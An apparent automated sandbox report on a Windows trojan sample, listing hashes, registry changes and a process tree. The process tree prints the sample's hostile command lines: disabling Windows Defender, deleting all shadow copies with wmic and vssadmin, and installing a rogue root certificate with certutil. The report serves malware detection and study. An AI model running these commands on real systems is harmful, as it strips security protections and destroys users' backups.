Analysis
- max time kernel: 151s
- max time network: 93s
- platform: windows7_x64
- resource: win7v200722
- submitted: 01-08-2020 19:32

Static task: static1

Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
- Resource: win7v200722

Behavioral task: behavioral2
- Sample: SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
- Resource: win10v200722
General
- Target: SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
- Size: 110KB
- MD5: 3af1d421410a6e528c93384a25437956
- SHA1: db52c58a5791865071b17ec7403b8ac9bb9abb66
- SHA256: 0f6166d9b707f8610c81b7068962611e25cdef8db665b10343179d82131ef0a3
- SHA512: 7aa68ef3f9d4b4a5e38a04c35aef1579b95cc3f0d221e900cf59564e9366fc19aacc0896d7034c6b084234614b8810782b5cb99be07396cc1179b960a4f5e3a9
Malware Config
Signatures

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid  | process
  1384 | powershell.exe
  1384 | powershell.exe
Modifies service (2 TTPs, 5 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend | REG.exe
Modifies Internet Explorer start page (1 TTPs, 1 IoCs)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.globes.co.il/en/article-israeli-cyber-security-co-secdo-raises-10m-1001165259" | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
Runs net.exe
Modifies security service (2 TTPs, 1 IoCs)
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2" | REG.exe
Suspicious use of WriteProcessMemory (28 IoCs)
Processes:
  description | pid | process | target process
  PID 1060 wrote to memory of 1292 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | net.exe
  PID 1060 wrote to memory of 1292 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | net.exe
  PID 1060 wrote to memory of 1292 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | net.exe
  PID 1060 wrote to memory of 1292 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | net.exe
  PID 1292 wrote to memory of 1296 | 1292 | net.exe | net1.exe
  PID 1292 wrote to memory of 1296 | 1292 | net.exe | net1.exe
  PID 1292 wrote to memory of 1296 | 1292 | net.exe | net1.exe
  PID 1292 wrote to memory of 1296 | 1292 | net.exe | net1.exe
  PID 1060 wrote to memory of 1384 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | powershell.exe
  PID 1060 wrote to memory of 1384 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | powershell.exe
  PID 1060 wrote to memory of 1384 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | powershell.exe
  PID 1060 wrote to memory of 1384 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | powershell.exe
  PID 1060 wrote to memory of 328 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | REG.exe
  PID 1060 wrote to memory of 328 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | REG.exe
  PID 1060 wrote to memory of 328 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | REG.exe
  PID 1060 wrote to memory of 328 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | REG.exe
  PID 1060 wrote to memory of 1036 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | wmic.exe
  PID 1060 wrote to memory of 1036 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | wmic.exe
  PID 1060 wrote to memory of 1036 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | wmic.exe
  PID 1060 wrote to memory of 1036 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | wmic.exe
  PID 1060 wrote to memory of 1796 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | vssadmin.exe
  PID 1060 wrote to memory of 1796 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | vssadmin.exe
  PID 1060 wrote to memory of 1796 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | vssadmin.exe
  PID 1060 wrote to memory of 1796 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | vssadmin.exe
  PID 1060 wrote to memory of 1628 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | certutil.exe
  PID 1060 wrote to memory of 1628 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | certutil.exe
  PID 1060 wrote to memory of 1628 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | certutil.exe
  PID 1060 wrote to memory of 1628 | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe | certutil.exe
Suspicious use of AdjustPrivilegeToken (45 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1384 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 1036 | wmic.exe
  Token: SeSecurityPrivilege | 1036 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 1036 | wmic.exe
  Token: SeLoadDriverPrivilege | 1036 | wmic.exe
  Token: SeSystemProfilePrivilege | 1036 | wmic.exe
  Token: SeSystemtimePrivilege | 1036 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 1036 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 1036 | wmic.exe
  Token: SeCreatePagefilePrivilege | 1036 | wmic.exe
  Token: SeBackupPrivilege | 1036 | wmic.exe
  Token: SeRestorePrivilege | 1036 | wmic.exe
  Token: SeShutdownPrivilege | 1036 | wmic.exe
  Token: SeDebugPrivilege | 1036 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 1036 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 1036 | wmic.exe
  Token: SeUndockPrivilege | 1036 | wmic.exe
  Token: SeManageVolumePrivilege | 1036 | wmic.exe
  Token: 33 | 1036 | wmic.exe
  Token: 34 | 1036 | wmic.exe
  Token: 35 | 1036 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 1036 | wmic.exe
  Token: SeSecurityPrivilege | 1036 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 1036 | wmic.exe
  Token: SeLoadDriverPrivilege | 1036 | wmic.exe
  Token: SeSystemProfilePrivilege | 1036 | wmic.exe
  Token: SeSystemtimePrivilege | 1036 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 1036 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 1036 | wmic.exe
  Token: SeCreatePagefilePrivilege | 1036 | wmic.exe
  Token: SeBackupPrivilege | 1036 | wmic.exe
  Token: SeRestorePrivilege | 1036 | wmic.exe
  Token: SeShutdownPrivilege | 1036 | wmic.exe
  Token: SeDebugPrivilege | 1036 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 1036 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 1036 | wmic.exe
  Token: SeUndockPrivilege | 1036 | wmic.exe
  Token: SeManageVolumePrivilege | 1036 | wmic.exe
  Token: 33 | 1036 | wmic.exe
  Token: 34 | 1036 | wmic.exe
  Token: 35 | 1036 | wmic.exe
  Token: SeBackupPrivilege | 1792 | vssvc.exe
  Token: SeRestorePrivilege | 1792 | vssvc.exe
  Token: SeAuditPrivilege | 1792 | vssvc.exe
  Token: SeDebugPrivilege | 1060 | SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid  | process
  1796 | vssadmin.exe
Processes (process tree; indentation shows parent/child relationship)

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe"
  - Modifies Internet Explorer start page
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\net.exe
    command line: "net" stop WinDefend
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop WinDefend

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\REG.exe
    command line: "REG" add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 2 /f
    - Modifies service
    - Modifies security service

  C:\Windows\SysWOW64\Wbem\wmic.exe
    command line: "wmic" shadowcopy delete
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\vssadmin.exe
    command line: "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
    - Interacts with shadow copies

  C:\Windows\SysWOW64\certutil.exe
    command line: "certutil" -addstore ROOT c:\windows\temp\MyEvilCert.cer

C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/328-5-0x0000000000000000-mapping.dmp
- memory/1036-6-0x0000000000000000-mapping.dmp
- memory/1292-0-0x0000000000000000-mapping.dmp
- memory/1296-1-0x0000000000000000-mapping.dmp
- memory/1384-2-0x0000000000000000-mapping.dmp
- memory/1628-8-0x0000000000000000-mapping.dmp
- memory/1796-7-0x0000000000000000-mapping.dmp